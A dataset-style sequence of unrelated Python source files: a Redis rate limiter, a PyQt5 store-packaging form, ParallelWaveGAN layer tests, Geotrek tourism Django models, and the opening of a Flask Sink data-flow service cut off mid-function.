rk_tokens = 'rlim::%s::tokens::%s::r%s' % (self.namespace, self.identifier, rule.to_string())
rk_last_ts = 'rlim::%s::last_ts::%s::r%s' % (self.namespace, self.identifier, rule.to_string())
rule_ttl_seconds = rule.period_seconds + 10
try:
rv_last_ts = float(self.redisdb.get(rk_last_ts))
rv_tokens = float(self.redisdb.get(rk_tokens))
except Exception:
            # Initialize values if they do not exist yet
rv_last_ts = time.time()
rv_tokens = rule.tokens
self.redisdb.set(rk_tokens, rv_tokens, ex=rule_ttl_seconds)
self.redisdb.set(rk_last_ts, '%.3f' % rv_last_ts, ex=rule_ttl_seconds)
# Add fresh tokens since last timestamp
with self.redisdb.pipeline() as pipe:
pipe.watch(rk_last_ts)
            # Clamp at zero: float precision could make this value negative
            # Add tokens accrued during the elapsed time
            seconds_passed = max(time.time() - rv_last_ts, 0)
            fresh_tokens = rule.fresh_tokens_by_seconds(seconds_passed)
remaining_tokens = rv_tokens
            # Only top up when at least one whole fresh token has accrued;
            # the elapsed time may be under a second even when fresh_tokens >= 1
if fresh_tokens >= 1 and remaining_tokens < rule.tokens:
                # Never let the bucket hold more than rule.tokens
fresh_tokens = min(fresh_tokens, rule.tokens - remaining_tokens)
pipe.multi()
pipe.incrbyfloat(rk_tokens, fresh_tokens)
pipe.expire(rk_tokens, rule_ttl_seconds)
pipe.set(rk_last_ts, '%.3f' % time.time(), ex=rule_ttl_seconds)
# Ignore WatchError
try:
pipe.execute()
except WatchError:
pass
        # Consume tokens; if the tokens to consume exceed the remaining tokens,
        # add them back and mark the request as not allowed (False)
remaining_tokens = self.redisdb.incrbyfloat(rk_tokens, -tokens)
over_limit = False
if remaining_tokens < 0:
remaining_tokens = self.redisdb.incrbyfloat(rk_tokens, tokens)
over_limit = True
return {
'allowed': not over_limit,
'remaining_tokens': max(remaining_tokens, 0)
}
class SimpleLimiter(BaseRateLimiter):
def prepare(self):
self.simple_incr = self.redisdb.register_script('''\
local current
current = redis.call("incr", KEYS[1])
if tonumber(current) == 1 then
redis.call("expire", KEYS[1], ARGV[1])
end
return current''')
def acquire_by_single_rule(self, rule, tokens=1):
"""Acquire an request quota from limiter
:param rule: `Rule` object
:param int tokens: tokens to be consumed, default 1
:returns: a dict of `allowed` and `remaining_tokens`
            - allowed: whether this request is allowed
- remaining_tokens: remaining_tokens for this rule's period
"""
# TODO: Should we use ( current timestamp / period_seconds ) as part of the redis key?
rk_counter = 'rlim::%s::scounter::%s::r%s' % (self.namespace, self.identifier, rule.to_string())
old_cnt = self.redisdb.get(rk_counter)
if old_cnt is not None and int(old_cnt) >= rule.tokens:
return {
'allowed': False,
'remaining_tokens': 0.0
}
new_cnt = self.simple_incr(keys=[rk_counter], args=[rule.period_seconds])
return {
'allowed': True,
'remaining_tokens': max(0, rule.tokens - new_cnt)
}
class Rule(object):
"""Rule class for RateLimiter"""
time_unit_to_seconds = {
'second': 1,
'minute': 60,
'hour': 3600,
'day': 3600 * 24,
}
@classmethod
def period_to_seonds(cls, period):
for unit, seconds in cls.time_unit_to_seconds.items():
if unit in period:
period_seconds = period[unit] * seconds
break
else:
raise ValueError(('Invalid period %s given, should be '
'{"second/minute/hour/day": NUMBER}') % period)
return period_seconds
def __init__(self, tokens, period_seconds):
self.tokens = tokens
        # Period is kept to whole-second precision
self.period_seconds = int(period_seconds)
if tokens < 0:
            logger.warning('Will not allow any acquire because given tokens < 0')
def to_string(self):
return "%s_%s" % (self.tokens, self.period_seconds)
def fresh_tokens_by_seconds(self, seconds):
return int(self.rate_per_seconds * seconds)
@property
def rate_per_seconds(self):
return self.tokens / float(self.period_seconds)
def __repr__(self):
return '<Rule %s>' % self.to_string()
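
# --- Illustrative usage sketch (not part of the original module) -------------
# A hedged demo of the bookkeeping above; the token/period numbers are
# arbitrary choices, and the commented-out limiter call assumes a reachable
# local redis instance.
if __name__ == '__main__':
    demo_rule = Rule(tokens=60, period_seconds=Rule.period_to_seonds({'minute': 1}))
    # 60 tokens per 60 seconds -> exactly one token accrues per second
    assert demo_rule.rate_per_seconds == 1.0
    assert demo_rule.fresh_tokens_by_seconds(30) == 30
    # With a live redis connection the limiters defined above would be used as:
    #   import redis
    #   limiter = SimpleLimiter(redis.Redis(), identifier='user_id=42',
    #                           tokens=60, period={'minute': 1})
    #   print(limiter.acquire())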
| 2.140625 | 2 |
tela_cadastro_loja_embala.py | lucasHashi/PyQt5-gerenciador-de-vendas-de-comidas | 1 | 11078 | <reponame>lucasHashi/PyQt5-gerenciador-de-vendas-de-comidas
import sys
from PyQt5 import QtCore, QtGui, QtWidgets, uic
import database_receita
import pyqt5_aux
qt_tela_inicial = "telas/tela_cadastro_loja_embala.ui"
Ui_MainWindow, QtBaseClass = uic.loadUiType(qt_tela_inicial)
class MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):
switch_tela_gerenciar_loja_embala = QtCore.pyqtSignal(int, int, float, str, str, int, str, float, str)
def __init__(self):
QtWidgets.QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.setupUi(self)
        # CONFIGURE BUTTONS
self.btn_cadastrar.pressed.connect(self.cadastrar_loja_embala)
self.btn_limpar.pressed.connect(self.limpar_loja_embala)
self.btn_ativa_loja.pressed.connect(self.ativar_loja)
self.btn_sair.pressed.connect(self.fechar_tela)
        # LOAD THE INGREDIENTS COMBO BOX
self.carrega_ingredientes()
        # WHEN AN INGREDIENT IS SELECTED IN THE COMBO BOX
self.combo_ingrediente.currentIndexChanged.connect(self.ingrediente_selecionado)
        # WHEN A PACKAGE IS DOUBLE-CLICKED
self.list_embalagens.itemDoubleClicked.connect(self.embalagem_selecionada)
        # WHEN A STORE IS SELECTED, PUT IT IN TXT_LOJA
self.carrega_lojas()
self.combo_loja.currentIndexChanged.connect(self.loja_selecionada)
        # WHEN A REGISTERED ENTRY IS DOUBLE-CLICKED
self.tb_loja_embala_cadastrados.cellDoubleClicked.connect(self.loja_embala_selecionado)
        # REFRESH THE LOJA_EMBALA TABLE
#self.carrega_loja_embala()
header = self.tb_loja_embala_cadastrados.horizontalHeader()
self.tb_loja_embala_cadastrados.setHorizontalHeaderLabels(['Codigo', 'Tamanho', 'Unidade', 'Marca', 'Loja', 'Preço'])
#header.setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(2, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(4, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(5, QtWidgets.QHeaderView.ResizeToContents)
def carrega_loja_embala(self, id_ingrediente):
lista_dados = database_receita.select_loja_embala_por_ingrediente_lista(id_ingrediente)
pyqt5_aux.carregar_dados_table_widget(self.tb_loja_embala_cadastrados, lista_dados)
def embalagem_selecionada(self, item):
self.combo_loja.setEnabled(True)
self.btn_ativa_loja.setEnabled(True)
self.btn_cadastrar.setEnabled(True)
self.btn_limpar.setEnabled(True)
self.double_preco.setEnabled(True)
self.txt_embalagem.setText(str(item.text()))
def loja_selecionada(self, item):
try:
_, nome = str(self.combo_loja.currentText()).split(' - ')
self.txt_loja.setText(nome)
except:
self.txt_loja.clear()
def ingrediente_selecionado(self, item):
try:
id_ingrediente = str(self.combo_ingrediente.currentText()).split(' - ')[0]
self.carrega_embalagens(id_ingrediente)
self.list_embalagens.setEnabled(True)
self.carrega_loja_embala(id_ingrediente)
except:
self.list_embalagens.setEnabled(False)
def carrega_ingredientes(self):
lista_ingredientes = ['Ingredientes cadastrados']
lista_ingredientes += database_receita.select_ingredientes_nomes()
self.combo_ingrediente.addItems(lista_ingredientes)
def cadastrar_loja_embala(self):
try:
id_loja, nome_loja = self.combo_loja.currentText().split(' - ')
except ValueError:
id_loja, nome_loja = 0, self.txt_loja.text()
        # REGISTER THE STORE IF IT IS NEW
if(self.txt_loja.isEnabled()):
id_loja = database_receita.insere_loja(nome_loja)
        # GET THE DATA: ID_LOJA, ID_EMBALAGEM, PRECO
id_embalagem = int(str(self.txt_embalagem.text()).split(' - ')[0])
preco = self.double_preco.value()
        # REGISTER THE LOJA_EMBALA RECORD
database_receita.insere_loja_embala(preco, id_loja, id_embalagem)
        # REFRESH THE LOJA_EMBALA TABLE
id_ingrediente = self.combo_ingrediente.currentText().split(' - ')[0]
self.carrega_loja_embala(id_ingrediente)
        # CLEAR: LOJA, PRECO, TXT_EMBALAGEM
self.txt_loja.clear()
self.txt_loja.setEnabled(False)
self.btn_ativa_loja.setText('+')
self.btn_ativa_loja.setEnabled(False)
self.carrega_lojas()
self.double_preco.clear()
self.double_preco.setEnabled(False)
self.txt_embalagem.clear()
        # DISABLE BUTTONS: CADASTRAR, LIMPAR
self.btn_cadastrar.setEnabled(False)
self.btn_limpar.setEnabled(False)
def carrega_embalagens(self, id_ingrediente):
self.list_embalagens.clear()
lista_embalagens = database_receita.select_embalagens_por_ingrediente_nomes(id_ingrediente)
self.list_embalagens.addItems(lista_embalagens)
def carrega_lojas(self):
self.combo_loja.clear()
lista_lojas = ['Lojas cadastradas']
lista_lojas += database_receita.select_lojas_nomes()
self.combo_loja.addItems(lista_lojas)
def ativar_loja(self):
if(self.txt_loja.isEnabled()):
self.txt_loja.clear()
self.txt_loja.setEnabled(False)
self.btn_ativa_loja.setText('+')
self.combo_loja.setEnabled(True)
else:
self.txt_loja.setEnabled(True)
self.btn_ativa_loja.setText('-')
self.combo_loja.setEnabled(False)
def limpar_loja_embala(self):
        # CLEAR: LOJA, PRECO, TXT_EMBALAGEM
self.txt_loja.clear()
self.txt_loja.setEnabled(False)
self.btn_ativa_loja.setText('+')
self.btn_ativa_loja.setEnabled(False)
self.carrega_lojas()
self.double_preco.clear()
self.double_preco.setEnabled(False)
def loja_embala_selecionado(self, linha, coluna):
id_loja_embala = self.tb_loja_embala_cadastrados.item(linha, 0).text()
_, _, id_loja, id_embalagem = database_receita.select_loja_embala_por_id(id_loja_embala)
tamanho = self.tb_loja_embala_cadastrados.item(linha, 1).text()
unidade = self.tb_loja_embala_cadastrados.item(linha, 2).text()
marca = self.tb_loja_embala_cadastrados.item(linha, 3).text()
nome_loja = self.tb_loja_embala_cadastrados.item(linha, 4).text()
preco = self.tb_loja_embala_cadastrados.item(linha, 5).text()
ingrediente = self.combo_ingrediente.currentText().split(' - ')[1]
print(id_loja_embala, id_embalagem, tamanho, unidade, marca, id_loja, nome_loja, preco, ingrediente)
self.switch_tela_gerenciar_loja_embala.emit(int(id_loja_embala), int(id_embalagem), float(tamanho), unidade, marca, int(id_loja), nome_loja, float(preco), ingrediente)
def fechar_tela(self):
self.close()
| 2.46875 | 2 |
test/test_layers.py | mukeshv0/ParallelWaveGAN | 0 | 11079 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 <NAME>
# MIT License (https://opensource.org/licenses/MIT)
import logging
import numpy as np
import torch
from parallel_wavegan.layers import Conv1d
from parallel_wavegan.layers import Conv1d1x1
from parallel_wavegan.layers import Conv2d
from parallel_wavegan.layers import ConvInUpsampleNetwork
from parallel_wavegan.layers import UpsampleNetwork
logging.basicConfig(
level=logging.DEBUG, format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s")
def test_conv_initialization():
conv = Conv1d(10, 10, 3, bias=True)
np.testing.assert_array_equal(conv.bias.data.numpy(),
np.zeros_like(conv.bias.data.numpy()))
conv1x1 = Conv1d1x1(10, 10, bias=True)
np.testing.assert_array_equal(conv1x1.bias.data.numpy(),
np.zeros_like(conv1x1.bias.data.numpy()))
kernel_size = (10, 10)
conv2d = Conv2d(10, 10, kernel_size, bias=True)
np.testing.assert_array_equal(conv2d.weight.data.numpy(),
np.ones_like(conv2d.weight.data.numpy()) / np.prod(kernel_size))
np.testing.assert_array_equal(conv2d.bias.data.numpy(),
np.zeros_like(conv2d.bias.data.numpy()))
kernel_size = (1, 10)
conv2d = Conv2d(10, 10, kernel_size, bias=True)
np.testing.assert_array_equal(conv2d.weight.data.numpy(),
np.ones_like(conv2d.weight.data.numpy()) / np.prod(kernel_size))
np.testing.assert_array_equal(conv2d.bias.data.numpy(),
np.zeros_like(conv2d.bias.data.numpy()))
def test_upsample():
length = 10
scales = [4, 4]
x = torch.randn(1, 10, length)
upsample = UpsampleNetwork(scales)
y = upsample(x)
assert x.size(-1) * np.prod(scales) == y.size(-1)
for aux_context_window in [0, 1, 2, 3]:
conv_upsample = ConvInUpsampleNetwork(scales,
aux_channels=x.size(1),
aux_context_window=aux_context_window)
y = conv_upsample(x)
assert (x.size(-1) - 2 * aux_context_window) * np.prod(scales) == y.size(-1)
| 2.15625 | 2 |
geotrek/tourism/models.py | ker2x/Geotrek-admin | 0 | 11080 | <gh_stars>0
import os
import re
import logging
from django.conf import settings
from django.contrib.gis.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.formats import date_format
from easy_thumbnails.alias import aliases
from easy_thumbnails.exceptions import InvalidImageFormatError
from easy_thumbnails.files import get_thumbnailer
from mapentity.registry import registry
from mapentity.models import MapEntityMixin
from mapentity.serializers import plain_text, smart_plain_text
from geotrek.authent.models import StructureRelated
from geotrek.core.models import Topology
from geotrek.common.mixins import (NoDeleteMixin, TimeStampedModelMixin,
PictogramMixin, OptionalPictogramMixin,
PublishableMixin, PicturesMixin,
AddPropertyMixin)
from geotrek.common.models import Theme
from geotrek.common.utils import intersecting
from extended_choices import Choices
if 'modeltranslation' in settings.INSTALLED_APPS:
from modeltranslation.manager import MultilingualManager
else:
from django.db.models import Manager as MultilingualManager
logger = logging.getLogger(__name__)
def _get_target_choices():
""" Populate choices using installed apps names.
"""
apps = [('public', _("Public website"))]
for model, entity in registry.registry.items():
if entity.menu:
appname = model._meta.app_label.lower()
apps.append((appname, unicode(entity.label)))
return tuple(apps)
class InformationDeskType(PictogramMixin):
label = models.CharField(verbose_name=_(u"Label"), max_length=128, db_column='label')
class Meta:
db_table = 't_b_type_renseignement'
verbose_name = _(u"Information desk type")
verbose_name_plural = _(u"Information desk types")
ordering = ['label']
def __unicode__(self):
return self.label
class InformationDesk(models.Model):
name = models.CharField(verbose_name=_(u"Title"), max_length=256, db_column='nom')
type = models.ForeignKey(InformationDeskType, verbose_name=_(u"Type"),
related_name='desks', db_column='type')
description = models.TextField(verbose_name=_(u"Description"), blank=True, db_column='description',
help_text=_(u"Brief description"))
phone = models.CharField(verbose_name=_(u"Phone"), max_length=32,
blank=True, null=True, db_column='telephone')
email = models.EmailField(verbose_name=_(u"Email"), max_length=256, db_column='email',
blank=True, null=True)
website = models.URLField(verbose_name=_(u"Website"), max_length=256, db_column='website',
blank=True, null=True)
photo = models.FileField(verbose_name=_(u"Photo"), upload_to=settings.UPLOAD_DIR,
db_column='photo', max_length=512, blank=True, null=True)
street = models.CharField(verbose_name=_(u"Street"), max_length=256,
blank=True, null=True, db_column='rue')
postal_code = models.CharField(verbose_name=_(u"Postal code"), max_length=8,
blank=True, null=True, db_column='code')
municipality = models.CharField(verbose_name=_(u"Municipality"),
blank=True, null=True,
max_length=256, db_column='commune')
geom = models.PointField(verbose_name=_(u"Emplacement"), db_column='geom',
blank=True, null=True,
srid=settings.SRID, spatial_index=False)
objects = models.GeoManager()
class Meta:
db_table = 't_b_renseignement'
verbose_name = _(u"Information desk")
verbose_name_plural = _(u"Information desks")
ordering = ['name']
def __unicode__(self):
return self.name
@property
def description_strip(self):
"""Used in trek public template.
"""
nobr = re.compile(r'(\s*<br.*?>)+\s*', re.I)
newlines = nobr.sub("\n", self.description)
return smart_plain_text(newlines)
@property
def serializable_type(self):
return {
'id': self.type.id,
'label': self.type.label,
'pictogram': self.type.pictogram.url,
}
@property
def latitude(self):
if self.geom:
api_geom = self.geom.transform(settings.API_SRID, clone=True)
return api_geom.y
return None
@property
def longitude(self):
if self.geom:
api_geom = self.geom.transform(settings.API_SRID, clone=True)
return api_geom.x
return None
@property
def thumbnail(self):
if not self.photo:
return None
thumbnailer = get_thumbnailer(self.photo)
try:
return thumbnailer.get_thumbnail(aliases.get('thumbnail'))
except InvalidImageFormatError:
logger.warning(_("Image %s invalid or missing from disk.") % self.photo)
return None
@property
def photo_url(self):
thumbnail = self.thumbnail
if not thumbnail:
return None
return os.path.join(settings.MEDIA_URL, thumbnail.name)
GEOMETRY_TYPES = Choices(
('POINT', 'point', _('Point')),
('LINE', 'line', _('Line')),
('POLYGON', 'polygon', _('Polygon')),
('ANY', 'any', _('Any')),
)
class TouristicContentCategory(PictogramMixin):
label = models.CharField(verbose_name=_(u"Label"), max_length=128, db_column='nom')
geometry_type = models.CharField(db_column="type_geometrie", max_length=16,
choices=GEOMETRY_TYPES, default=GEOMETRY_TYPES.POINT)
type1_label = models.CharField(verbose_name=_(u"First list label"), max_length=128,
db_column='label_type1', blank=True)
type2_label = models.CharField(verbose_name=_(u"Second list label"), max_length=128,
db_column='label_type2', blank=True)
order = models.IntegerField(verbose_name=_(u"Order"), null=True, blank=True, db_column='tri',
help_text=_(u"Alphabetical order if blank"))
id_prefix = 'C'
class Meta:
db_table = 't_b_contenu_touristique_categorie'
verbose_name = _(u"Touristic content category")
verbose_name_plural = _(u"Touristic content categories")
ordering = ['order', 'label']
def __unicode__(self):
return self.label
@property
def prefixed_id(self):
return '{prefix}{id}'.format(prefix=self.id_prefix, id=self.id)
class TouristicContentType(OptionalPictogramMixin):
label = models.CharField(verbose_name=_(u"Label"), max_length=128, db_column='nom')
category = models.ForeignKey(TouristicContentCategory, related_name='types',
verbose_name=_(u"Category"), db_column='categorie')
# Choose in which list of choices this type will appear
in_list = models.IntegerField(choices=((1, _(u"First")), (2, _(u"Second"))), db_column='liste_choix')
class Meta:
db_table = 't_b_contenu_touristique_type'
verbose_name = _(u"Touristic content type")
verbose_name_plural = _(u"Touristic content type")
ordering = ['label']
def __unicode__(self):
return self.label
class TouristicContentType1Manager(MultilingualManager):
def get_queryset(self):
return super(TouristicContentType1Manager, self).get_queryset().filter(in_list=1)
class TouristicContentType2Manager(MultilingualManager):
def get_queryset(self):
return super(TouristicContentType2Manager, self).get_queryset().filter(in_list=2)
class TouristicContentType1(TouristicContentType):
objects = TouristicContentType1Manager()
def __init__(self, *args, **kwargs):
self._meta.get_field('in_list').default = 1
super(TouristicContentType1, self).__init__(*args, **kwargs)
class Meta:
proxy = True
verbose_name = _(u"Type")
verbose_name_plural = _(u"First list types")
class TouristicContentType2(TouristicContentType):
objects = TouristicContentType2Manager()
def __init__(self, *args, **kwargs):
self._meta.get_field('in_list').default = 2
super(TouristicContentType2, self).__init__(*args, **kwargs)
class Meta:
proxy = True
verbose_name = _(u"Type")
verbose_name_plural = _(u"Second list types")
class ReservationSystem(models.Model):
name = models.CharField(verbose_name=_(u"Name"), max_length=256,
blank=False, null=False, unique=True)
def __unicode__(self):
return self.name
class Meta:
db_table = 't_b_systeme_reservation'
verbose_name = _(u"Reservation system")
verbose_name_plural = _(u"Reservation systems")
class TouristicContent(AddPropertyMixin, PublishableMixin, MapEntityMixin, StructureRelated,
TimeStampedModelMixin, PicturesMixin, NoDeleteMixin):
""" A generic touristic content (accomodation, museum, etc.) in the park
"""
description_teaser = models.TextField(verbose_name=_(u"Description teaser"), blank=True,
help_text=_(u"A brief summary"), db_column='chapeau')
description = models.TextField(verbose_name=_(u"Description"), blank=True, db_column='description',
help_text=_(u"Complete description"))
themes = models.ManyToManyField(Theme, related_name="touristiccontents",
db_table="t_r_contenu_touristique_theme", blank=True, verbose_name=_(u"Themes"),
help_text=_(u"Main theme(s)"))
geom = models.GeometryField(verbose_name=_(u"Location"), srid=settings.SRID)
category = models.ForeignKey(TouristicContentCategory, related_name='contents',
verbose_name=_(u"Category"), db_column='categorie')
contact = models.TextField(verbose_name=_(u"Contact"), blank=True, db_column='contact',
help_text=_(u"Address, phone, etc."))
email = models.EmailField(verbose_name=_(u"Email"), max_length=256, db_column='email',
blank=True, null=True)
website = models.URLField(verbose_name=_(u"Website"), max_length=256, db_column='website',
blank=True, null=True)
practical_info = models.TextField(verbose_name=_(u"Practical info"), blank=True, db_column='infos_pratiques',
help_text=_(u"Anything worth to know"))
type1 = models.ManyToManyField(TouristicContentType, related_name='contents1',
verbose_name=_(u"Type 1"), db_table="t_r_contenu_touristique_type1",
blank=True)
type2 = models.ManyToManyField(TouristicContentType, related_name='contents2',
verbose_name=_(u"Type 2"), db_table="t_r_contenu_touristique_type2",
blank=True)
source = models.ManyToManyField('common.RecordSource',
blank=True, related_name='touristiccontents',
verbose_name=_("Source"), db_table='t_r_contenu_touristique_source')
portal = models.ManyToManyField('common.TargetPortal',
blank=True, related_name='touristiccontents',
verbose_name=_("Portal"), db_table='t_r_contenu_touristique_portal')
eid = models.CharField(verbose_name=_(u"External id"), max_length=1024, blank=True, null=True, db_column='id_externe')
reservation_system = models.ForeignKey(ReservationSystem, verbose_name=_(u"Reservation system"),
blank=True, null=True)
reservation_id = models.CharField(verbose_name=_(u"Reservation ID"), max_length=1024,
blank=True, db_column='id_reservation')
approved = models.BooleanField(verbose_name=_(u"Approved"), default=False, db_column='labellise')
objects = NoDeleteMixin.get_manager_cls(models.GeoManager)()
class Meta:
db_table = 't_t_contenu_touristique'
verbose_name = _(u"Touristic content")
verbose_name_plural = _(u"Touristic contents")
def __unicode__(self):
return self.name
@property
def districts_display(self):
return ', '.join([unicode(d) for d in self.districts])
@property
def type1_label(self):
return self.category.type1_label
@property
def type2_label(self):
return self.category.type2_label
@property
def type1_display(self):
return ', '.join([unicode(n) for n in self.type1.all()])
@property
def type2_display(self):
return ', '.join([unicode(n) for n in self.type2.all()])
@property
def prefixed_category_id(self):
return self.category.prefixed_id
def distance(self, to_cls):
return settings.TOURISM_INTERSECTION_MARGIN
@property
def type(self):
"""Fake type to simulate POI for mobile app v1"""
return self.category
@property
def min_elevation(self):
return 0
@property
def max_elevation(self):
return 0
@property
def portal_display(self):
return ', '.join([unicode(portal) for portal in self.portal.all()])
@property
def source_display(self):
return ','.join([unicode(source) for source in self.source.all()])
@property
def themes_display(self):
return ','.join([unicode(source) for source in self.themes.all()])
@property
def extent(self):
return self.geom.buffer(10).transform(settings.API_SRID, clone=True).extent
@property
def rando_url(self):
category_slug = _(u'touristic-content')
return '{}/{}/'.format(category_slug, self.slug)
@property
def meta_description(self):
return plain_text(self.description_teaser or self.description)[:500]
Topology.add_property('touristic_contents', lambda self: intersecting(TouristicContent, self), _(u"Touristic contents"))
Topology.add_property('published_touristic_contents', lambda self: intersecting(TouristicContent, self).filter(published=True), _(u"Published touristic contents"))
TouristicContent.add_property('touristic_contents', lambda self: intersecting(TouristicContent, self), _(u"Touristic contents"))
TouristicContent.add_property('published_touristic_contents', lambda self: intersecting(TouristicContent, self).filter(published=True), _(u"Published touristic contents"))
class TouristicEventType(OptionalPictogramMixin):
type = models.CharField(verbose_name=_(u"Type"), max_length=128, db_column='type')
class Meta:
db_table = 't_b_evenement_touristique_type'
verbose_name = _(u"Touristic event type")
verbose_name_plural = _(u"Touristic event types")
ordering = ['type']
def __unicode__(self):
return self.type
class TouristicEvent(AddPropertyMixin, PublishableMixin, MapEntityMixin, StructureRelated,
PicturesMixin, TimeStampedModelMixin, NoDeleteMixin):
""" A touristic event (conference, workshop, etc.) in the park
"""
description_teaser = models.TextField(verbose_name=_(u"Description teaser"), blank=True,
help_text=_(u"A brief summary"), db_column='chapeau')
description = models.TextField(verbose_name=_(u"Description"), blank=True, db_column='description',
help_text=_(u"Complete description"))
themes = models.ManyToManyField(Theme, related_name="touristic_events",
db_table="t_r_evenement_touristique_theme", blank=True, verbose_name=_(u"Themes"),
help_text=_(u"Main theme(s)"))
geom = models.PointField(verbose_name=_(u"Location"), srid=settings.SRID)
begin_date = models.DateField(blank=True, null=True, verbose_name=_(u"Begin date"), db_column='date_debut')
end_date = models.DateField(blank=True, null=True, verbose_name=_(u"End date"), db_column='date_fin')
duration = models.CharField(verbose_name=_(u"Duration"), max_length=64, blank=True, db_column='duree',
help_text=_(u"3 days, season, ..."))
meeting_point = models.CharField(verbose_name=_(u"Meeting point"), max_length=256, blank=True, db_column='point_rdv',
help_text=_(u"Where exactly ?"))
meeting_time = models.TimeField(verbose_name=_(u"Meeting time"), blank=True, null=True, db_column='heure_rdv',
help_text=_(u"11:00, 23:30"))
contact = models.TextField(verbose_name=_(u"Contact"), blank=True, db_column='contact')
email = models.EmailField(verbose_name=_(u"Email"), max_length=256, db_column='email',
blank=True, null=True)
website = models.URLField(verbose_name=_(u"Website"), max_length=256, db_column='website',
blank=True, null=True)
organizer = models.CharField(verbose_name=_(u"Organizer"), max_length=256, blank=True, db_column='organisateur')
speaker = models.CharField(verbose_name=_(u"Speaker"), max_length=256, blank=True, db_column='intervenant')
type = models.ForeignKey(TouristicEventType, verbose_name=_(u"Type"), blank=True, null=True, db_column='type')
accessibility = models.CharField(verbose_name=_(u"Accessibility"), max_length=256, blank=True, db_column='accessibilite')
participant_number = models.CharField(verbose_name=_(u"Number of participants"), max_length=256, blank=True, db_column='nb_places')
booking = models.TextField(verbose_name=_(u"Booking"), blank=True, db_column='reservation')
target_audience = models.CharField(verbose_name=_(u"Target audience"), max_length=128, blank=True, null=True, db_column='public_vise')
practical_info = models.TextField(verbose_name=_(u"Practical info"), blank=True, db_column='infos_pratiques',
help_text=_(u"Recommandations / To plan / Advices"))
source = models.ManyToManyField('common.RecordSource',
blank=True, related_name='touristicevents',
verbose_name=_("Source"), db_table='t_r_evenement_touristique_source')
portal = models.ManyToManyField('common.TargetPortal',
blank=True, related_name='touristicevents',
verbose_name=_("Portal"), db_table='t_r_evenement_touristique_portal')
eid = models.CharField(verbose_name=_(u"External id"), max_length=1024, blank=True, null=True, db_column='id_externe')
approved = models.BooleanField(verbose_name=_(u"Approved"), default=False, db_column='labellise')
objects = NoDeleteMixin.get_manager_cls(models.GeoManager)()
category_id_prefix = 'E'
class Meta:
db_table = 't_t_evenement_touristique'
verbose_name = _(u"Touristic event")
verbose_name_plural = _(u"Touristic events")
ordering = ['-begin_date']
def __unicode__(self):
return self.name
@property
def type1(self):
return [self.type] if self.type else []
@property
def type2(self):
return []
@property
def districts_display(self):
return ', '.join([unicode(d) for d in self.districts])
@property
def dates_display(self):
if not self.begin_date and not self.end_date:
return u""
elif not self.end_date:
return _(u"starting from {begin}").format(
begin=date_format(self.begin_date, 'SHORT_DATE_FORMAT'))
elif not self.begin_date:
return _(u"up to {end}").format(
end=date_format(self.end_date, 'SHORT_DATE_FORMAT'))
elif self.begin_date == self.end_date:
return date_format(self.begin_date, 'SHORT_DATE_FORMAT')
else:
return _(u"from {begin} to {end}").format(
begin=date_format(self.begin_date, 'SHORT_DATE_FORMAT'),
end=date_format(self.end_date, 'SHORT_DATE_FORMAT'))
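    # Illustrative sketch: with begin_date=date(2020, 3, 1) and end_date=date(2020, 3, 3)
    # this renders roughly as "from 03/01/2020 to 03/03/2020" (the exact text depends on
    # the active locale's SHORT_DATE_FORMAT); with only begin_date set it reads
    # "starting from 03/01/2020".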
@property
def prefixed_category_id(self):
return self.category_id_prefix
def distance(self, to_cls):
return settings.TOURISM_INTERSECTION_MARGIN
@property
def portal_display(self):
return ', '.join([unicode(portal) for portal in self.portal.all()])
@property
def source_display(self):
return ', '.join([unicode(source) for source in self.source.all()])
@property
def themes_display(self):
        return ','.join([unicode(theme) for theme in self.themes.all()])
@property
def rando_url(self):
category_slug = _(u'touristic-event')
return '{}/{}/'.format(category_slug, self.slug)
@property
def meta_description(self):
return plain_text(self.description_teaser or self.description)[:500]
TouristicEvent.add_property('touristic_contents', lambda self: intersecting(TouristicContent, self), _(u"Touristic contents"))
TouristicEvent.add_property('published_touristic_contents', lambda self: intersecting(TouristicContent, self).filter(published=True), _(u"Published touristic contents"))
Topology.add_property('touristic_events', lambda self: intersecting(TouristicEvent, self), _(u"Touristic events"))
Topology.add_property('published_touristic_events', lambda self: intersecting(TouristicEvent, self).filter(published=True), _(u"Published touristic events"))
TouristicContent.add_property('touristic_events', lambda self: intersecting(TouristicEvent, self), _(u"Touristic events"))
TouristicContent.add_property('published_touristic_events', lambda self: intersecting(TouristicEvent, self).filter(published=True), _(u"Published touristic events"))
TouristicEvent.add_property('touristic_events', lambda self: intersecting(TouristicEvent, self), _(u"Touristic events"))
TouristicEvent.add_property('published_touristic_events', lambda self: intersecting(TouristicEvent, self).filter(published=True), _(u"Published touristic events"))
| 1.820313 | 2 |
Service_Components/Sink/Sink_DataFlow.py | mydata-sdk/mydata-sdk-1.x | 0 | 11081 | <filename>Service_Components/Sink/Sink_DataFlow.py
# -*- coding: utf-8 -*-
from signed_requests.signed_request_auth import SignedRequest
__author__ = 'alpaloma'
from flask import Blueprint, current_app, request
from helpers import Helpers
import requests
from json import dumps, loads
from DetailedHTTPException import error_handler
from flask_restful import Resource, Api
import logging
from jwcrypto import jwk
from Templates import Sequences
debug_log = logging.getLogger("debug")
logger = logging.getLogger("sequence")
api_Sink_blueprint = Blueprint("api_Sink_blueprint", __name__)
api = Api()
api.init_app(api_Sink_blueprint)
sq = Sequences("Service_Components Mgmnt (Sink)", {})
# import xmltodict
# @api.representation('application/xml')
# def output_xml(data, code, headers=None):
# if isinstance(data, dict):
# xm = {"response": data}
# resp = make_response(xmltodict.unparse(xm, pretty=True), code)
# resp.headers.extend(headers)
# return resp
class Status(Resource):
@error_handler
def get(self):
status = {"status": "running", "service_mode": "Sink"}
return status
class DataFlow(Resource):
def __init__(self):
super(DataFlow, self).__init__()
self.service_url = current_app.config["SERVICE_URL"]
self.operator_url = current_app.config["OPERATOR_URL"]
self.helpers = Helpers(current_app.config)
@error_handler
def post(self): # TODO Make this a GET
def renew_token(operator_url, record_id):
sq.task("Renewing Auth Token.")
token = requests.get(
